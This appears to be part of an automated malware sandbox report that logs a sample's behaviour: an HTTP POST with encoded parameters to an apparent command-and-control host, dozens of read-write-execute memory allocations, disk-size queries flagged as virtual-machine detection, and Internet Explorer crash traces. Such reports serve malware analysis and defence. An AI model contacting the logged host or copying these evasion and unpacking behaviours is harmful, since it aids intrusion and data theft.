request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml

Sends data using the HTTP POST Method (1 event)

request

POST http://woocommerce.paythrow.com/ImageauthDefaultdatalife.php?2OL=SwS41cDzrj4dKNxtQ1GiBhD1ZRm1R&Sv4obaEY=7Wx8wOWhQsrwAHm3vtaej0LhdRJigvX&fa9a090b987653b38ee351c6997fee95=gN3EGM0EWZmN2N3kTNjFDOiRzMzMmMwY2NmVWYwYDO5kDNjN2MwUGO3UzM2YzM1kTOxQzM0cjN&2b1c408e9fe9d1b07178e7714de714be=wMjFDZkJjZkBzMzMGNjhDO4E2YzYmZxQ2MklDMkRjMmJjZ3YjM3M2M

Allocates read-write-execute memory (usually to unpack itself) (50 out of 248 events)

Time & API	Arguments	Status	Return
NtProtectVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2820 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73982000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00520000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00640000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72981000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72982000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 region_size: 262144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00410000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00410000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00680000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000 process_handle: 0xffffffff		3221225496
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00681000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00682000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 688128 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004b6000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 163840 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004b8000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73a82000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73a82000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:53 p.m.	process_identifier: 1156 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000007b30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 2228224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6f291000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6f292000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02742000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02743000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02744000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02777000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02762000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02775000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02745000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 20, 2021, 2:59 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02746000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (4 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceExW Dec. 20, 2021, 2:59 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 0 root_path: C:\Program Files (x86)\Investintech.com Inc\Slim PDF Reader 2.0\ total_number_of_bytes: 70705682280		0
GetDiskFreeSpaceExW Dec. 20, 2021, 2:59 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 0 root_path: C:\Program Files (x86)\Investintech.com Inc\ total_number_of_bytes: 70705682280		0
GetDiskFreeSpaceExW Dec. 20, 2021, 2:59 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 13676314624 root_path: C:\Program Files (x86)\ total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Dec. 20, 2021, 2:52 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 13626699776 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer total_number_of_bytes: 0	1	1

An application raised an exception which may be indicative of an exploit crash (3 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 2840 crashed
__exception__ Dec. 20, 2021, 3:01 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x76af374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x76844387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x76aeef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x76ae6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x76ae6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x76ae6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x76b05c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x76b806b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x7691d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x7691d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x7691ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x76838a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x76838938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7683950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x7691dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x7691db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x7691e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x76839367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x76839326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x76be62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x76be6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x76be77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x76be788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x767fa48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x767f853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x767fa4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x7680cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x7680d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x760cb727 registers.esp: 113504196 registers.edi: 96664716 registers.eax: 113504196 registers.ebp: 113504276 registers.edx: 100 registers.ebx: 113504560 registers.esi: 2147746133 registers.ecx: 96398568	1	0	0
__exception__ Dec. 20, 2021, 3:01 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x76af374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x7691f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x76b0414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x767efe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x7691a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x752de99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x752b72ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752aab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752aea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752a87f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752aba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x76be62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x76be6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x76be77c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x76be7bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x752d516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x752d50ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752aa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752a9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752a9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x752d530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x752d57a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x6c40540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x6c4052ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x6c4e0ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x776a7e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x776854f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x760cb727 registers.esp: 79158216 registers.edi: 1988295184 registers.eax: 79158216 registers.ebp: 79158296 registers.edx: 1 registers.ebx: 6246028 registers.esi: 2147746133 registers.ecx: 3931816420	1	0	0

Application Crash

Process iexplore.exe with pid 2840 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

Dec. 20, 2021, 3:01 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x76af374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x76844387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x76aeef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x76ae6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x76ae6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x76ae6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x76b05c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x76b806b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x7691d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x7691d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x7691ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x76838a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x76838938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7683950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x7691dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x7691db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x7691e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x76839367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x76839326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x76be62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x76be6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x76be77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x76be788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x767fa48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x767f853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x767fa4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x7680cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x7680d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

__exception__

Dec. 20, 2021, 3:01 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x76af374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x7691f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x76b0414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x767efe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x7691a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x752de99f
